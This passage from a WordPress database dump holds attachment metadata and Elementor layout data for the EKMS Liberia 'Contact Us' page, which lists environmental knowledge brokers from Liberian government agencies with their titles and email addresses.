Liberia\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:15:\"activeItemIndex\";i:1;s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;}'),(21901,3171,'_wp_attached_file','2020/10/aw2.jpg'),(21902,3171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:15:\"2020/10/aw2.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"aw2-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"aw2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21903,3172,'_elementor_edit_mode','builder'),(21904,3172,'_elementor_template_type','wp-page'),(21905,3172,'_elementor_version','2.8.1'),(21906,3172,'_wp_page_template','default'),(21907,3172,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21910,3173,'_wp_attached_file','2020/10/AW-scaled.jpg'),(21911,3173,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:21:\"2020/10/AW-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"AW-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"AW-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"AW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"AW-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"AW-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:16:\"AW-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:6:\"AW.jpg\";}'),(21912,3174,'_elementor_edit_mode','builder'),(21913,3174,'_elementor_template_type','wp-page'),(21914,3174,'_elementor_version','3.0.12'),(21915,3174,'_wp_page_template','default'),(21916,3174,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 